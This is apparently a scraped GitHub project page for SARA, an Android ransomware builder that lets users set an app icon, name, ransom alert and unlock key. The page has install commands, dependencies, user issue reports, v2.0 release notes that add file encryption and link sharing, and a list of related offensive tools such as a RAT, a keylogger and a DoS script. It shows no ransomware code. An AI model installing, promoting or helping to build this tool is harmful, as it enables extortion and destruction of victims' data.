SARA - Simple Android Ransomware Attack

Overview

SARA - Simple Android Ransomware Attack

Disclaimer

The author is not responsible for any issues or damage caused by this program.

Features

User can customize:

  • app_icon - custom icon application
  • app_name - custom name application
  • alert_title - custom alert title
  • alert_desc - custom alert description
  • key_pass - custom key for unlock devices

Installation

Tested on Ubuntu, I never try installing in other OS

git clone https://github.com/termuxhackers-id/SARA && cd SARA && sudo bash install.sh

Dependencies

  • Java
    • Openjdk 11
  • Aapt
  • Apktool
    • Apktool 2.4.0
  • Zipalign
  • Imagemagick
  • Python3
  • Python3-pip
    • Pillow

Tools overview

For Termux you have to install Ubuntu Termux

Ransomware overview

Tested on devices Android 10

Output logs

Support Us

Facebook Pages @termuxhackers.id
Instagram @termuxhackers.id

Credit's

Copyright © 2021 by Termux Hackers

You might also like...
Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX
Web3 Pancakeswap Sniper & honeypot detector Take Profit/StopLose bot written in python3, For ANDROID WIN MAC & LINUX

🏆 Pancakeswap BSC Sniper Bot web3 with honeypot detector (ANDROID WINDOWS MAC LINUX) 🥇 ⭐️ ⭐️ ⭐️ First SNIPER BOT for ANDROID & WINDOWS with honeypot

Android Malware (Analysis | Scoring) System
Android Malware (Analysis | Scoring) System

An Obfuscation-Neglect Android Malware Scoring System Quark-Engine is also bundled with Kali Linux, BlackArch. A trust-worthy, practical tool that's r

This is an injection tool that can inject any xposed modules apk into the debug android app

This is an injection tool that can inject any xposed modules apk into the debug android app, the native code in the xposed module can also be injected.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by launching a dictionary based attack against a webserver and analyse its response.

DirBruter DirBruter is a Python based CLI tool. It looks for hidden or existing directories/files using brute force method. It basically works by laun

A Proof-of-Concept Layer 2 Denial of Service Attack that disrupts low level operations of Programmable Logic Controllers within industrial environments. Utilizing multithreaded processing, Automator-Terminator delivers a powerful wave of spoofed ethernet packets to a null MAC address.
A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3

arp_spoof_detector A repository to detect the ARP spoofing in any devices and prevent Man in the Middle(MITM) attack using Python3 Usage: git clone ht

Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

Comments
  • Unable to run Sara

    Unable to run Sara

    ~/SARA $ python3 sara.py Traceback (most recent call last): File "/data/data/com.termux/files/home/SARA/sara.py", line 231, in check_requirements() File "/data/data/com.termux/files/home/SARA/sara.py", line 25, in check_requirements java_version=os.popen("java --version","r").read().splitlines()[0] IndexError: list index out of range

    I tried to rerun it but it brought this out

    opened by Codesam1 2
  • SET app icon

    SET app icon

    ERROR File not found please fill correctly !

    SET APP_ICON (PNG: icon.png):

    I've been stuck on this,i tried sdcard and internal storage, please help

    opened by Viper55 1
Releases(v2.0)
  • v2.0(Sep 12, 2022)

    Whats Changed ?

    1. New ransomware type file encryption.
    2. User can share their ransomware via the link
    3. Update SARA repository size to 7,82 MiB
    4. Ransomware already tested on Android 10
    5. Support for termux non-root

    Can u help me with click the forks and star on this repository? Thank you 🙂

    Source code(tar.gz)
    Source code(zip)
Owner
Termux Hackers
🎖️ Termux Enthusiast
Termux Hackers
Buff A simple BOF library I wrote under an hour to help me automate with BOF attack

What is Buff? A simple BOF library I wrote under an hour to help me automate with BOF attack. It comes with fuzzer and a generic method to generate ex

0x00 3 Nov 21, 2022
Simple script for looping a Denial Of Service (DoS) attack over one single mac address in range

Bluetooth Simple Denial Of Service (DoS) Legal Note This project is made only for educational purposes and for helping in Proofs of Concept. The autho

null 1 Jan 9, 2022
This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

This is simple python FTP password craker. To crack FTP login using wordlist based brute force attack

Varun Jagtap 5 Oct 8, 2022
Arbitrium is a cross-platform, fully undetectable remote access trojan, to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding rules

About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an

Ayoub 861 Feb 18, 2021
Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Pupy Installation Installation instructions are on the wiki, in addition to all other documentation. For maximum compatibility, it is recommended to u

null 7.4k Jan 4, 2023
Data Recovery from your broken Android phone

Broken Phone Recovery a guide how to backup data from your locked android phone if you broke your screen (and more) you can skip some steps depending

v1nc 25 Sep 23, 2022
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

null 27 Sep 23, 2022
adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

null 136 Jan 2, 2023
this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows and macos

Keylogger this keylogger is only for pc not for android but it will only work on those pc who have python installed it is made for all linux,windows a

Titan_Exodous 1 Nov 4, 2021
Dumps the payload.bin image found in Android update images.

payload dumper Dumps the payload.bin image found in Android update images. Has significant performance gains over other tools due to using multiproces

Rasmus 7 Nov 17, 2022